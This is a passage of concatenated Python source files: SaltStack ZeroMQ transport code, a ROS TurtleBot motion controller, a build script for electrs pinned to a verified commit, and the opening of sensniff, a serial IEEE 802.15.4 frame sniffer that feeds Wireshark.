'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) log.debug("Connecting to pub server: %s", pull_uri) self.pub_sock.connect(pull_uri) return self._sock_data.sock def pub_close(self): ''' Disconnect an existing publisher socket and remove it from the local thread's cache. ''' if hasattr(self._sock_data, 'sock'): self._sock_data.sock.close() delattr(self._sock_data, 'sock') def publish(self, load): ''' Publish "load" to minions. This send the load to the publisher daemon process with does the actual sending to minions. 
:param dict load: A load to be sent across the wire to minions ''' payload = {'enc': 'aes'} crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value) payload['load'] = crypticle.dumps(load) if self.opts['sign_pub_messages']: master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem') log.debug("Signing data packet") payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load']) int_payload = {'payload': self.serial.dumps(payload)} # add some targeting stuff for lists only (for now) if load['tgt_type'] == 'list': int_payload['topic_lst'] = load['tgt'] # If zmq_filtering is enabled, target matching has to happen master side match_targets = ["pcre", "glob", "list"] if self.opts['zmq_filtering'] and load['tgt_type'] in match_targets: # Fetch a list of minions that match _res = self.ckminions.check_minions(load['tgt'], tgt_type=load['tgt_type']) match_ids = _res['minions'] log.debug("Publish Side Match: %s", match_ids) # Send list of miions thru so zmq can target them int_payload['topic_lst'] = match_ids payload = self.serial.dumps(int_payload) log.debug( 'Sending payload to publish daemon. jid=%s size=%d', load.get('jid', None), len(payload), ) if not self.pub_sock: self.pub_connect() self.pub_sock.send(payload) log.debug('Sent payload to publish daemon.') class AsyncReqMessageClientPool(salt.transport.MessageClientPool): ''' Wrapper class of AsyncReqMessageClientPool to avoid blocking waiting while writing data to socket. ''' def __init__(self, opts, args=None, kwargs=None): super(AsyncReqMessageClientPool, self).__init__(AsyncReqMessageClient, opts, args=args, kwargs=kwargs) def __del__(self): self.destroy() def destroy(self): for message_client in self.message_clients: message_client.destroy() self.message_clients = [] def send(self, *args, **kwargs): message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue)) return message_clients[0].send(*args, **kwargs) # TODO: unit tests! class AsyncReqMessageClient(object): ''' This class wraps the underlying zeromq REQ socket and gives a future-based interface to sending and recieving messages. This works around the primary limitation of serialized send/recv on the underlying socket by queueing the message sends in this class. In the future if we decide to attempt to multiplex we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial ''' def __init__(self, opts, addr, linger=0, io_loop=None): ''' Create an asynchronous message client :param dict opts: The salt opts dictionary :param str addr: The interface IP address to bind to :param int linger: The number of seconds to linger on a ZMQ socket. 
See http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER] :param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop] ''' self.opts = opts self.addr = addr self.linger = linger if io_loop is None: install_zmq() ZMQDefaultLoop.current() else: self.io_loop = io_loop self.serial = salt.payload.Serial(self.opts) self.context = zmq.Context() # wire up sockets self._init_socket() self.send_queue = [] # mapping of message -> future self.send_future_map = {} self.send_timeout_map = {} # message -> timeout # TODO: timeout all in-flight sessions, or error def destroy(self): if hasattr(self, 'stream') and self.stream is not None: if ZMQ_VERSION_INFO < (14, 3, 0): # stream.close() doesn't work properly on pyzmq < 14.3.0 if self.stream.socket: self.stream.socket.close() self.stream.io_loop.remove_handler(self.stream.socket) # set this to None, more hacks for messed up pyzmq self.stream.socket = None self.socket.close() else: self.stream.close() self.socket = None self.stream = None if self.context.closed is False: self.context.term() def __del__(self): self.destroy() def _init_socket(self): if hasattr(self, 'stream'): self.stream.close() # pylint: disable=E0203 self.socket.close() # pylint: disable=E0203 del self.stream del self.socket self.socket = self.context.socket(zmq.REQ) # socket options if hasattr(zmq, 'RECONNECT_IVL_MAX'): self.socket.setsockopt( zmq.RECONNECT_IVL_MAX, 5000 ) _set_tcp_keepalive(self.socket, self.opts) if self.addr.startswith('tcp://['): # Hint PF type if bracket enclosed IPv6 address if hasattr(zmq, 'IPV6'): self.socket.setsockopt(zmq.IPV6, 1) elif hasattr(zmq, 'IPV4ONLY'): self.socket.setsockopt(zmq.IPV4ONLY, 0) self.socket.linger = self.linger log.debug('Trying to connect to: %s', self.addr) self.socket.connect(self.addr) self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop) @tornado.gen.coroutine def _internal_send_recv(self): while len(self.send_queue) > 0: message = self.send_queue[0] future = self.send_future_map.get(message, None) if future is None: # Timedout del self.send_queue[0] continue # send def mark_future(msg): if not future.done(): data = self.serial.loads(msg[0]) future.set_result(data) self.stream.on_recv(mark_future) self.stream.send(message) try: ret = yield future except Exception as err: # pylint: disable=W0702 log.debug('Re-init ZMQ socket: %s', err) self._init_socket() # re-init the zmq socket (no other way in zmq) del self.send_queue[0] continue del self.send_queue[0] self.send_future_map.pop(message, None) self.remove_message_timeout(message) def remove_message_timeout(self, message): if message not in self.send_timeout_map: return timeout = self.send_timeout_map.pop(message, None) if timeout is not None: # Hasn't been already timedout self.io_loop.remove_timeout(timeout) def timeout_message(self, message): ''' Handle a message timeout by removing it from the sending queue and informing the caller :raises: SaltReqTimeoutError ''' future = self.send_future_map.pop(message, None) # In a race condition the message might have been sent by the time # we're timing it out. Make sure the future is not None if future is not None: del self.send_timeout_map[message] if future.attempts < future.tries: future.attempts += 1 log.debug('SaltReqTimeoutError, retrying. 
(%s/%s)', future.attempts, future.tries) self.send( message, timeout=future.timeout, tries=future.tries, future=future, ) else: future.set_exception(SaltReqTimeoutError('Message timed out')) def send(self, message, timeout=None, tries=3, future=None, callback=None, raw=False): ''' Return a future which will be completed when the message has a response ''' if future is None: future = tornado.concurrent.Future() future.tries = tries future.attempts = 0 future.timeout = timeout # if a future wasn't passed in, we need to serialize the message message = self.serial.dumps(message) if callback is not None: def handle_future(future): response = future.result() self.io_loop.add_callback(callback, response) future.add_done_callback(handle_future) # Add this future to the mapping self.send_future_map[message] = future if self.opts.get('detect_mode') is True: timeout = 1 if timeout is not None: send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message) self.send_timeout_map[message] = send_timeout if len(self.send_queue) == 0: self.io_loop.spawn_callback(self._internal_send_recv) self.send_queue.append(message) return future class ZeroMQSocketMonitor(object): __EVENT_MAP = None def __init__(self, socket): ''' Create ZMQ monitor sockets More information: http://api.zeromq.org/4-0:zmq-socket-monitor ''' self._socket = socket self._monitor_socket = self._socket.get_monitor_socket() self._monitor_stream = None def start_io_loop(self, io_loop): log.trace("Event monitor start!") self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop) self._monitor_stream.on_recv(self.monitor_callback) def start_poll(self): log.trace("Event monitor start!") try: while self._monitor_socket is not None and self._monitor_socket.poll(): msg = self._monitor_socket.recv_multipart() self.monitor_callback(msg) except (AttributeError, zmq.error.ContextTerminated): # We cannot log here because we'll get an interrupted system call in trying # to flush the logging buffer as we terminate pass @property def event_map(self): if ZeroMQSocketMonitor.__EVENT_MAP is None: event_map = {} for name in dir(zmq): if name.startswith('EVENT_'): value = getattr(zmq, name) event_map[value] = name ZeroMQSocketMonitor.__EVENT_MAP = event_map return ZeroMQSocketMonitor.__EVENT_MAP def monitor_callback(self, msg): evt = zmq.utils.monitor.parse_monitor_message(msg) evt['description'] = self.event_map[evt['event']] log.debug("ZeroMQ event: %s", evt) if evt['event'] == zmq.EVENT_MONITOR_STOPPED: self.stop() def stop(self): if self._socket is None: return self._socket.disable_monitor() self._socket = None self._monitor_socket = None if self._monitor_stream is not None: self._monitor_stream.close() self._monitor_stream = None log.trace("Event monitor done!")
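

# Editor's usage sketch (added; not part of the original salt module). It
# shows how the future-based AsyncReqMessageClient defined above could be
# driven from a Tornado coroutine. The contents of the opts dict and the
# tcp:// address are placeholders, not values taken from this file.
@tornado.gen.coroutine
def _example_req_roundtrip(opts, addr='tcp://127.0.0.1:4506'):
    '''
    Send a single payload through AsyncReqMessageClient and yield the reply.
    Assumes `opts` is a complete salt opts dictionary.
    '''
    import tornado.ioloop  # local import; the sketch only needs the IOLoop
    client = AsyncReqMessageClient(opts, addr,
                                   io_loop=tornado.ioloop.IOLoop.current())
    try:
        # send() serializes the dict, queues it behind any in-flight request
        # and resolves the returned future once the REP side answers (or
        # raises SaltReqTimeoutError after `tries` timed-out attempts).
        reply = yield client.send({'cmd': 'ping'}, timeout=5, tries=3)
        raise tornado.gen.Return(reply)
    finally:
        client.destroy()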
programmable.py
#Copyright (c) 2017 Andre Santos # #Permission is hereby granted, free of charge, to any person obtaining a copy #of this software and associated documentation files (the "Software"), to deal #in the Software without restriction, including without limitation the rights #to use, copy, modify, merge, publish, distribute, sublicense, and/or sell #copies of the Software, and to permit persons to whom the Software is #furnished to do so, subject to the following conditions: #The above copyright notice and this permission notice shall be included in #all copies or substantial portions of the Software. #THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR #IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, #FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE #AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER #LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN #THE SOFTWARE. from collections import namedtuple from math import pi, sqrt from threading import Thread, Lock import rospy from geometry_msgs.msg import Twist from kobuki_msgs.msg import BumperEvent from nav_msgs.msg import Odometry from tf.transformations import euler_from_quaternion PI2 = 2 * pi LINEAR = 0.2 # m/s ANGULAR = pi/6 # rad/s def angle_distance(alpha, beta): d = alpha - beta s = 1 if (d >= 0.0 and d <= pi) or (d <= -pi and d >= -PI2) else -1 d = abs(d) % PI2 r = PI2 - d if d > pi else d return r * s ############################################################################### # Robot State ############################################################################### State = namedtuple("State", ["translation", "rotation", "bump_center", "bump_left", "bump_right"]) class Robot(object): def __init__(self): self.translation = 0.0 self.rotation = 0.0 self.bump_left = False self.bump_right = False self.bump_center = False self.x = 0.0 self.y = 0.0 self.a = 0.0 self.lock = Lock() # Thread: subscriber def set_odometry(self, x, y, a): with self.lock: if not (self.bump_center or self.bump_left or self.bump_right): self.translation += sqrt((x - self.x)**2 + (y - self.y)**2) self.rotation += abs(angle_distance(a, self.a)) self.x = x self.y = y self.a = a # Thread: subscriber def set_bumper(self, center, left, right): with self.lock: if center: self.bump_center = True if left: self.bump_left = True if right: self.bump_right = True # Thread: publisher def get_state(self): with self.lock: state = State(self.translation, self.rotation, self.bump_center, self.bump_left, self.bump_right) self.translation = 0.0 self.rotation = 0.0 self.bump_center = False self.bump_left = False self.bump_right = False return state ############################################################################### # Publisher ############################################################################### class Publisher(object): def __init__(self, robot, callbacks): self.robot = robot self.to_walk = 0.0 self.to_rotate = 0.0 self.change_cmd = 0 self.commands = [] self.contador = 0 self.thread = None self.twist = None self.shutdown = False self.stop_msg = Twist() self.stop_msg.linear.x = 0 self.stop_msg.linear.y = 0 self.stop_msg.linear.z = 0 self.stop_msg.angular.x = 0 self.stop_msg.angular.y = 0 self.stop_msg.angular.z = 0 self.init = callbacks.get("init") or self.skip self.bump_center = callbacks.get("bump_center") or self.skip self.bump_left = callbacks.get("bump_left") or 
self.skip self.bump_right = callbacks.get("bump_right") or self.skip self.walk_done = callbacks.get("walk_done") or self.skip self.rotate_done = callbacks.get("rotate_done") or self.skip def start(self): self.thread = Thread(target = self.spin) self.thread.daemon = True self.thread.start() def spin(self): rate = rospy.Rate(15) cmd_vel = rospy.Publisher("cmd_vel", Twist, queue_size = 10) self.set_twist(0.0, 0.0) self.init(self) while not self.shutdown: state = self.robot.get_state() if self.change_cmd: self.change_cmd -= 1 cmd_vel.publish(self.stop_msg) else: if self.to_walk > 0.0: self.to_walk -= state.translation if self.to_walk <= 0.0: self.to_walk = 0.0 self.set_twist(0.0, 0.0) self.walk_done(self) if self.change_cmd: cmd_vel.publish(self.stop_msg) else: cmd_vel.publish(self.twist) if self.to_rotate > 0.0: self.to_rotate -= state.rotation if self.to_rotate <= 0.0: self.to_rotate = 0.0 self.set_twist(0.0, 0.0) self.rotate_done(self) if self.change_cmd: cmd_vel.publish(self.stop_msg) else: cmd_vel.publish(self.twist) if state.bump_center: self.bump_center(self) elif state.bump_left: self.bump_left(self) elif state.bump_right: self.bump_right(self) rate.sleep() cmd_vel.unregister() def set_twist(self, vx, wz): if vx == 0.0 and wz == 0.0: self.twist = self.stop_msg else: self.twist = Twist() self.twist.linear.x = vx self.twist.linear.y = 0 self.twist.linear.z = 0 self.twist.angular.x = 0 self.twist.angular.y = 0 self.twist.angular.z = wz def skip(self, robot): if self.commands: cmd, val = self.commands.pop(0) cmd(val) else: self.terminar() def andar(self, meters): self.change_cmd = 3 self.to_rotate = 0.0 if meters > 0: self.to_walk = meters self.set_twist(LINEAR, 0.0) def rodar(self, radians): self.change_cmd = 3 self.to_walk = 0.0 if radians > 0: self.to_rotate = radians self.set_twist(0.0, ANGULAR) elif radians < 0: self.to_rotate = -radians self.set_twist(0.0, -ANGULAR) def executar_depois(self, cmd, value): self.commands.append((getattr(self, cmd), value)) def cancelar_comando(self): if self.to_walk > 0.0 or self.to_rotate > 0.0: self.to_walk = 0.0 self.to_rotate = 0.0 self.set_twist(0.0, 0.0) if self.commands: cmd, val = self.commands.pop(0) cmd(val) def conta(self): self.contador += 1 def desconta(self): self.contador -= 1 def terminar(self): self.to_walk = 0.0 self.to_rotate = 0.0 self.set_twist(0.0, 0.0) self.shutdown = True ############################################################################### # Robot Controller ############################################################################### class RobotController(object): def __init__(self, callbacks): self.robot = Robot() self.publisher = Publisher(self.robot, callbacks) self.odom = None self.bump = None self.odom_callback = self._on_first_odom def run(self): rospy.init_node("turtlebot") self.odom = rospy.Subscriber("odom", Odometry, self._on_odom) self.bump = rospy.Subscriber("events/bumper", BumperEvent, self._on_bump) try: rospy.spin() except rospy.ROSInterruptException as e: pass finally: self.odom.unregister() self.odom = None self.bump.unregister() self.bump = None self.publisher.shutdown = True self.publisher.thread.join() self.publisher.thread = None def _on_odom(self, msg): x = msg.pose.pose.position.x y = msg.pose.pose.position.y q = msg.pose.pose.orientation (roll, pitch, yaw) = euler_from_quaternion((q.x, q.y, q.z, q.w)) self.odom_callback(x, y, yaw) def _on_first_odom(self, x, y, a): self.robot.x = x self.robot.y = y self.robot.a = a self.publisher.start() self.odom_callback = self.robot.set_odometry def 
_on_bump(self, msg):
        if msg.state == BumperEvent.PRESSED:
            if msg.bumper == BumperEvent.CENTER:
                self.robot.set_bumper(True, False, False)
            elif msg.bumper == BumperEvent.LEFT:
                self.robot.set_bumper(False, True, False)
            elif msg.bumper == BumperEvent.RIGHT:
                self.robot.set_bumper(False, False, True)
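

###############################################################################
# Editor's usage sketch (added; not part of the original node). It shows one
# way the callback keys looked up in Publisher.__init__ above could be wired
# together; the 1.0 m legs and 90 degree turns are arbitrary example values.
###############################################################################

def _example_square_run():
    """Walk a square until a bumper is pressed (sketch; never called here)."""
    def on_init(pub):
        pub.andar(1.0)              # walk 1 m; walk_done fires when finished

    def on_walk_done(pub):
        pub.rodar(pi / 2)           # turn 90 degrees; rotate_done fires next

    def on_rotate_done(pub):
        pub.andar(1.0)              # start the next side of the square

    def on_bump(pub):
        pub.terminar()              # any bumper press shuts the publisher down

    callbacks = {
        "init": on_init,
        "walk_done": on_walk_done,
        "rotate_done": on_rotate_done,
        "bump_center": on_bump,
        "bump_left": on_bump,
        "bump_right": on_bump,
    }
    RobotController(callbacks).run()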
build_electrs.py
#!/usr/bin/env python3 import argparse import logging import os import sys import shutil GIT_REPO = "https://github.com/BitcoinUnlimited/electrs.git" GIT_BRANCH = "v0.7.0bu" EXPECT_HEAD = "8e1734d5d54339cc469ea6230b0e02395f2ab82d" ROOT_DIR = os.path.realpath( os.path.join(os.path.dirname(__file__), os.pardir, os.pardir)) ELECTRS_DIR = os.path.join(ROOT_DIR, "electrs") parser = argparse.ArgumentParser() parser.add_argument('--allow-modified', help='Allow building modified/dirty repo', action = "store_true") parser.add_argument('--verbose', help='Sets log level to DEBUG', action = "store_true") parser.add_argument('--dst', help='Where to copy produced binary', default=os.path.join(ROOT_DIR, "src")) parser.add_argument('--target', help='Target platform (e.g. x86_64-pc-linux-gnu)', default="x86_64-unknown-linux-gnu") args = parser.parse_args() level = logging.DEBUG if args.verbose else logging.INFO logging.basicConfig(format = '%(asctime)s.%(levelname)s: %(message)s', level=level, stream=sys.stdout) def bail(*args): logging.error(*args) sys.exit(1) def check_dependencies(): v = sys.version_info if v[0] < 3 or (v[0] == 3 and v[1] < 3): bail("python >= 3.3 required"); try: import git except Exception as e: logging.error("Failed to 'import git'") logging.error("Tip: On Debian/Ubuntu you need to install python3-git") bail(str(e)) import shutil if shutil.which("cargo") is None: logging.error("Cannot find 'cargo', will not be able to build electrs") logging.error("You need to install rust (1.28+) https://rustup.rs/") bail("rust not found") if not os.path.isdir(args.dst): bail("--dst provided '%s' is not a directory", args.dst) def clone_repo(): import git logging.info("Cloning %s to %s", GIT_REPO, ELECTRS_DIR) repo = git.Repo.clone_from(GIT_REPO, ELECTRS_DIR, branch=GIT_BRANCH) def verify_repo(allow_modified): import git repo = git.Repo(ELECTRS_DIR) if repo.is_dirty(): logging.error("Validation failed - electrs has local modifications.") allow_modified or bail("Bailing") if repo.head.object.hexsha != EXPECT_HEAD: # TODO: Add command line option to reset HEAD to GIT_BRANCH at EXPECT_HEAD logging.error("Validation failed - electrs HEAD differs from expected (%s vs %s)", repo.head.object.hexsha, EXPECT_HEAD) allow_modified or bail("Bailing") def output_reader(pipe, queue): try: with pipe: for l in iter(pipe.readline, b''): queue.put(l) finally: queue.put(None) def cargo_run(args): import subprocess from threading import Thread from queue import Queue cargo = shutil.which("cargo") args = [cargo] + args logging.info("Running %s", args) assert cargo is not None p = subprocess.Popen(args, cwd = ELECTRS_DIR, stdout = subprocess.PIPE, stderr = subprocess.PIPE) q = Queue() Thread(target = output_reader, args = [p.stdout, q]).start() Thread(target = output_reader, args = [p.stderr, q]).start() for line in iter(q.get, None): logging.info(line.decode('utf-8').rstrip()) p.wait() rc = p.returncode assert rc is not None if rc != 0: bail("cargo failed with return code %s", rc) def get_target(makefile_target): # Try to map target passed from makefile to the equalent in rust # To see supported targets, run: rustc --print target-list target_map = { 'x86_64-pc-linux-gnu' : 'x86_64-unknown-linux-gnu', 'i686-pc-linux-gnu' : 'i686-unknown-linux-gnu' } if makefile_target in target_map: return target_map[makefile_target] logging.warn("Target %s is not mapped, passing it rust and hoping it works" % makefile_target) return makefile_target check_dependencies() if not os.path.exists(ELECTRS_DIR): clone_repo() 
verify_repo(args.allow_modified)

cargo_run(["build", "--verbose", "--locked", "--release",
           "--target=%s" % get_target(args.target)])

cargo_run(["test", "--verbose", "--locked", "--release",
           "--target=%s" % get_target(args.target)])

src = os.path.join(ELECTRS_DIR, "target", get_target(args.target), "release", "electrs")
logging.info("Copying %s to %s", src, args.dst)
shutil.copy(src, args.dst)
logging.info("Done")
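

# ---------------------------------------------------------------------------
# Editor's sketch (added; not part of the original script): the reader-thread
# pattern used by cargo_run() above, reduced to a generic helper. The example
# command in the docstring is illustrative only.
# ---------------------------------------------------------------------------
def run_and_log(cmd, cwd=None):
    """Run `cmd` (e.g. ["rustc", "--version"]), log its output, return rc."""
    import subprocess
    from threading import Thread
    from queue import Queue

    p = subprocess.Popen(cmd, cwd=cwd,
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    q = Queue()
    # one output_reader thread per pipe; each pushes None when its pipe closes
    Thread(target=output_reader, args=[p.stdout, q]).start()
    Thread(target=output_reader, args=[p.stderr, q]).start()
    finished = 0
    while finished < 2:          # wait for both pipe sentinels
        line = q.get()
        if line is None:
            finished += 1
            continue
        logging.info(line.decode('utf-8').rstrip())
    p.wait()
    return p.returncode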
sensniff.py
#!/usr/bin/env python3 # Copyright (c) 2012, George Oikonomou (oikonomou@users.sf.net) # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # * Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # * Neither the name of the owner nor the names of its contributors may be # used to endorse or promote products derived from this software without # specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # Read IEEE802.15.4 frames from a serial line (captured by a sniffer) and pipe # them to wireshark. At the same time, the frames can be logged to a file for # subsequent offline processing # In interactive mode, the user can also input commands from stdin # ToDo: # * Configuration file support (ConfigParser ?) 
import serial import argparse import os import sys import select import time import stat import errno import logging import logging.handlers import struct import typing import time from threading import Thread from threading import Timer ##################################### ### Constants ##################################### __version__ = '1.3' ##################################### ### Default configuration values ##################################### defaults = { #'device': '/dev/ttyUSB0', 'device': None, 'channels': [1,3,5], #'baud_rate': 460800, 'baud_rate': 921600, 'out_file': 'sensniff.hexdump', 'out_fifo': '/tmp/sensniff', 'out_pcap': 'sensniff.pcap', 'debug_level': 'WARN', 'log_level': 'INFO', 'log_file': 'sensniff.log', } ##################################### ### PCAP and Command constants ##################################### LINKTYPE_IEEE802_15_4_NOFCS = 230 LINKTYPE_IEEE802_15_4 = 195 LINKTYPE_IEEE802_15_4_TAP = 283 MAGIC_NUMBER = 0xA1B2C3D4 VERSION_MAJOR = 2 VERSION_MINOR = 4 THISZONE = 0 SIGFIGS = 0 SNAPLEN = 0xFFFF NETWORK = LINKTYPE_IEEE802_15_4 PCAP_GLOBAL_HDR_FMT = '<LHHlLLL' PCAP_FRAME_HDR_FMT = '<LLLL' pcap_global_hdr = bytearray(struct.pack(PCAP_GLOBAL_HDR_FMT, MAGIC_NUMBER, VERSION_MAJOR, VERSION_MINOR, THISZONE, SIGFIGS, SNAPLEN, NETWORK)) def get_global_header(network:int) -> bytearray: return bytearray(struct.pack(PCAP_GLOBAL_HDR_FMT, MAGIC_NUMBER, VERSION_MAJOR, VERSION_MINOR, THISZONE, SIGFIGS, SNAPLEN, network)) CMD_FRAME = 0x00 CMD_CHANNEL = 0x01 CMD_CHANNEL_MIN = 0x02 CMD_CHANNEL_MAX = 0x03 CMD_PREAMBLE_CODE = 0x04 CMD_PRF = 0x05 CMD_DEBUG_MSG = 0x10 CMD_FRAME_TIME = 0x20 CMD_ERR_NOT_SUPPORTED = 0x7F CMD_GET_CHANNEL = 0x81 CMD_GET_CHANNEL_MIN = 0x82 CMD_GET_CHANNEL_MAX = 0x83 CMD_SET_CHANNEL = 0x84 CMD_SET_PREAMBLE_CODE = 0x85 CMD_SET_PRF_CODE = 0x86 SNIFFER_PROTO_VERSION = 2 ##################################### ### Globals ##################################### logger = logging.getLogger(__name__) stats = {} stop = False ##################################### #TODO: Extend pcap output with channel informtion (https://github.com/jkcko/ieee802.15.4-tap/blob/master/IEEE%20802.15.4%20TAP%20Link%20Type%20Specification.pdf) class Frame(object): def __init__(self, raw, timestamp, channel=-1): self.__raw = raw self.__t = timestamp self.len = len(self.__raw) self.rx_channel = channel self.__pcap_hdr = self.__generate_frame_hdr(self.len) self.pcap = bytearray(self.__pcap_hdr) + self.__raw self.hex = ''.join('%02x ' % c for c in self.__raw).rstrip() def __generate_frame_hdr(self, len: int): sec = int(self.__t) usec = int((self.__t - sec) * 1000000) return struct.pack(PCAP_FRAME_HDR_FMT, sec, usec, len, len) def get_pcap(self): return self.pcap def get_pcap_tap(self): """ Creates a pcap format that includes more state (currently only rx channel) information """ tap_tlvs = bytearray([]) # FCS type TLV fcs_tlv = bytearray((0).to_bytes(2,byteorder='little')) + bytearray((1).to_bytes(2, byteorder='little')) + bytearray([1]) + bytearray([0,0,0]) tap_tlvs += fcs_tlv # Channel TLV if self.rx_channel > 0: # Got channel information. 
Add this as a TLV channel_tlv = bytearray((3).to_bytes(2, byteorder='little')) + bytearray((3).to_bytes(2, byteorder='little')) # Type 3 (Channel), Length 3 (excluding padding) channel_tlv += bytearray(self.rx_channel.to_bytes(2,byteorder='little')) #channel number channel_tlv += bytearray([0]) # Channel page channel_tlv += bytearray([0]) # padding tap_tlvs += channel_tlv header_len = len(tap_tlvs) + 4 pcap_tap = bytearray([0,0]) pcap_tap += bytearray(header_len.to_bytes(2, byteorder="little")) pcap_tap += tap_tlvs pcap_tap += self.__raw # GENERATE THE PACKET HEADER pcap_header = self.__generate_frame_hdr(len(pcap_tap)) pcap_tap = bytearray(pcap_header) + pcap_tap return pcap_tap def get_hex(self): return self.hex ##################################### class SerialInputHandler(object): """ Creates a serial connection to the SenSniff supported device. The connection is used to receive sniffed frames and send commands to the device. """ def __init__(self, port = defaults['device'], baudrate = defaults['baud_rate'], rts_cts = False): self.__sensniff_magic_legacy = bytearray((0x53, 0x6E, 0x69, 0x66)) self.__sensniff_magic = bytearray((0xC1, 0x1F, 0xFE, 0x72)) stats['Captured'] = 0 stats['Non-Frame'] = 0 stats['Timestamps'] = list() self.rx_channel = 0 try: self.port = serial.Serial(port = port, baudrate = baudrate, bytesize = serial.EIGHTBITS, parity = serial.PARITY_NONE, stopbits = serial.STOPBITS_ONE, xonxoff = False, rtscts = rts_cts, timeout = 0.1) self.port.flushInput() self.port.flushOutput() except (serial.SerialException, ValueError, IOError, OSError) as e: logger.error('Error opening port: %s' % (port,)) logger.error('The error was: %s' % (e.args,)) sys.exit(1) logger.info('Serial port %s opened' % (self.port.name)) def read_frame(self): try: # Read the magic + 1 more byte b = self.port.read(5) size = len(b) except (IOError, OSError) as e: logger.error('Error reading port: %s' % (self.port.port,)) logger.error('The error was: %s' % (e.args,)) sys.exit(1) if size == 0: return b if size < 5: logger.warning('Read %d bytes but not part of a frame' % (size,)) self.port.flushInput() return '' if b[0:4] not in (self.__sensniff_magic, self.__sensniff_magic_legacy): # Peripheral UART output - print it per_out = self.port.readline().rstrip() try: logger.info("Peripheral: %s%s" % (b.decode(), per_out.decode())) except UnicodeDecodeError as e: logger.info("Error decoding peripheral output: %s"%e) stats['Non-Frame'] += 1 return '' # If we reach here: # Next byte == 1: Proto version 1, header follows # Next Byte != 1 && < 128. Old proto version. Frame follows, length == the byte b = bytearray(b) if b[4] != SNIFFER_PROTO_VERSION: # Legacy contiki sniffer support. 
Will slowly fade away size = b[4] try: b = self.port.read(size) except (IOError, OSError) as e: logger.error('Error reading port: %s' % (self.port.port,)) logger.error('The error was: %s' % (e.args,)) sys.exit(1) if len(b) != size: # We got the magic right but subsequent bytes did not match # what we expected to receive logger.warning('Read correct magic not followed by a frame') logger.warning('Expected %d bytes, got %d' % (size, len(b))) self.port.flushInput() return '' logger.info('Read a frame of size %d' % (len(b),)) stats['Captured'] += 1 return b # If we reach here, we have a packet of proto ver SNIFFER_PROTO_VERSION # Read CMD and LEN try: size = 0 b = self.port.read(3) size = len(b) except (IOError, OSError) as e: logger.error('Error reading port: %s' % (self.port.port,)) logger.error('The error was: %s' % (e.args[0],)) sys.exit(1) if size < 3: logger.warning('Read correct magic not followed by a frame header') logger.warning('Expected 3 bytes, got %d' % (len(b), )) self.port.flushInput() return '' b = bytearray(b) cmd = b[0] length = b[1] << 8 | b[2] if cmd == CMD_ERR_NOT_SUPPORTED: logger.warning("Peripheral reports unsupported command") return '' # Read the frame or command response b = self.port.read(length) if len(b) != length: # We got the magic right but subsequent bytes did not match # what we expected to receive logger.warning('Read correct header not followed by a frame') logger.warning('Expected %d bytes, got %d' % (length, len(b))) self.port.flushInput() return '' # If we reach here, b holds a frame or a command response of length len if cmd == CMD_FRAME: logger.info('Read a frame of size %d' % (length,)) stats['Captured'] += 1 return b elif cmd == CMD_FRAME_TIME: logger.info('Read frame of size %d' % (length-8,)) stats['Captured'] +=1 # The last 8 bytes are used as a timestamp timestamp_bytes = b[(len(b)-8):len(b)] timestamp = struct.unpack("Q", timestamp_bytes)[0] stats['Timestamps'].append(timestamp) frame = b[0:len(b)-8] return frame elif cmd == CMD_DEBUG_MSG: print('DBG: {}'.format(b.decode('ascii'))) return '' # If we reach here, we have a command response b = bytearray(b) logger.debug('Received a command response: [%02x %02x]' % (cmd, b[0])) # We'll only ever see one of these if the user asked for it, so we are # running interactive. 
